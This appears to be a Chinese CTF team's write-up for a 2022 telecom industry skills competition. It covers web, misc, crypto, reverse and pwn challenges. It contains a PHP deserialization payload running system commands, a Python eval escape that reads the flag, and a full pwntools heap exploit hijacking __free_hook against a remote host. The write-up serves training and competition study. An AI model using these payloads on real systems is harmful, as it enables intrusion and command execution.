EDI
JOIN US ▶▶▶
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。
(诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱root@edisec.net、shiyi@edisec.net(带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
1
web2
pop调用链
POST / HTTP/1.1Host: 80.endpoint-e646733904b94fe4929cda92cfb6e548.dasc.buuoj.cn:81Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/104.0.5112.102 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 740data=O%3A1%3A%22a%22%3A2%3A%7Bs%3A8%3A%22%00a%00_path%22%3BO%3A1%3A%22b%22%3A3%3A%7Bs%3A7%3A%22%00b%00name%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22%00b%00value%22%3BO%3A1%3A%22e%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A5%3A%22admin%22%3B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%27cat+%2Fflag%27%29%3B%3F%3E%22%3B%7Ds%3A7%3A%22%00b%00util%22%3BO%3A1%3A%22c%22%3A2%3A%7Bs%3A12%3A%22%00%2A%00container%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A4%3A%22evil%22%3B%7Ds%3A13%3A%22%00%2A%00extensions%22%3Ba%3A1%3A%7Bs%3A1%3A%22y%22%3Bs%3A9%3A%22evil%40load%22%3B%7D%7D%7Ds%3A8%3A%22%00a%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Br%3A2%3B%7D%7D
2
web3
initjs最下面 看到路由
1
misc eye
foremost分离zip 后crc爆破
2
calc
key="0317dcd25f8916b43998be722434ed14"def calc():line = input(" >>> ")print(line)if(len(line)>9):return print("500 Internal Server Errorn")try:print(eval(line))except:passdef supper_calc():print("Please enter the invitation code")code = input(" >>> ")if(code == key):line = input(" >>> ")try:print(eval(line))except:passelse:print("403 Forbiddenn")while(1):print("What do you want?")print('1.clac')print('2.supper clac')choice = input("Please input your option >>> ")if(choice == "1"):calc()input("press any key to continue...")elif(choice == "2"):supper_calc()input("press any key to continue...")else:print("404 NOT FOUNDn")input("press any key to continue...")
获取key
>>>__import__('os').system('cat /fl*')flag{99696097104207069032117932541956}
3
misc3
flag = ['119', '104', '121', '32', '116', '104', '101', '114', '101', '32','105', '115', '32', '111', '110', '108', '121', '32', '49', '50', '32', '112','97', '108', '109', '63', '119', '104', '97', '116', '32', '105', '115', '32','119', '114', '111', '110', '103', '32', '119', '105', '116', '104', '32', '116','104', '101', '32', '108', '101', '102', '116', '32', '54', '63', '119', '97','116', '99', '104', '32', '116', '104', '101', '32', '100', '105', '102', '102','101', '114', '101', '110', '99', '101', '32', '98', '101', '116', '119', '101','110', '110', '32', '49', '50', '32', '97', '110', '100', '32', '54', '75','75']name = ''for w in flag:print(chr(int(w)))name += chr(int(w))print(name)
1
babysm1
对c开3次方
https://sagecell.sagemath.org/
c = 2217344750798236287989923271111493621814821232365781784992845921175835939916080255971267802993897386183080504406849487970548937348304569582798336704291413362485808165972480022302292463614365892149324677003706817975871653875892621395157463049066727487824595070529224326645861a = c^(1/3)bytes.fromhex(hex(a)[2:])
2
old_rsa
3
奇怪的AES
1
ezxorcpp
看unk_5E3248
key = """v3[0] = 66;v3[1] = 20;v3[2] = 73;v3[3] = 17;v3[4] = 73;v3[5] = 67;v3[6] = 22;v3[7] = 21;v3[8] = 66;v3[9] = 73;v3[10] = 17;v3[11] = 71;v3[12] = 66;v3[13] = 67;v3[14] = 69;v3[15] = 69;v3[16] = 20;v3[17] = 18;v3[18] = 71;v3[19] = 18;v3[20] = 71;v3[21] = 18;v3[22] = 72;v3[23] = 18;v3[24] = 22;v3[25] = 72;v3[26] = 20;v3[27] = 70;v3[28] = 70;v3[29] = 20;v3[30] = 19;v3[31] = 17;"""import redata = re.findall("= (.*?);",key)# print(data)lisss = ['66', '20', '73', '17', '73', '67', '22', '21', '66', '73', '17', '71', '66', '67', '69', '69', '20', '18', '71', '18', '71', '18', '72', '18', '22', '72', '20', '70', '70', '20', '19', '17']flag = ''for w in lisss:print(chr(112^int(w)))flag += chr(112^int(w))print(flag[::-1])
1
pwn1
from pwn import *from LibcSearcher import *from sys import *context.log_level = 'debug'context.terminal = ['tmux','splitw','-h']file = './pwn'p = process(file)e = ELF(file)libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')if args.R:p = remote('1.14.97.218',28318)# e = ELF(file)# libc = ELF('./libc-2.27.buu.so')sla = lambda x,y : p.sendlineafter(x,y)sa = lambda x,y : p.sendafter(x,y)sl = lambda x : p.sendline(x)s = lambda x : p.send(x)ru = lambda x : p.recvuntil(x)r = lambda x : p.recv(x=None)rl = lambda : p.recvline()def debug(cmd=''):gdb.attach(p,cmd)pause()def init(name,password,email,x):sla('namen',name)sla('passwordn',password)sla('emailn',email)sla('do u wanna complete your messages?n',x)def add():sl('1')def edit(index,content):sl('2')sla('index:n',str(index))sla('content:n',str(content))def delete(index):sl('3')sla('index:n',str(index))def show(index):sl('4')sla('index:n',str(index))# init('a','a','a','a')# add()# edit(0,'a')# delete(0)# show(0)init('a','a','a','a')add()add()edit(0,'/bin/sh')debug()show(-4)free_hook = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) - 0x597ec8log.success('free_hook = '+hex(free_hook))libc_base = free_hook - libc.sym['__free_hook']log.success('libc_base = '+hex(libc_base))ones = [0x4f3d5,0x4f432,0x10a41c]one_gadget = libc_base + ones[1]edit(-9,p64(free_hook))edit(-0x1a,p64(one_gadget))delete(0)# free_hook =p.interactive()
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2022年第三届电信和互联网行业职业技能竞赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论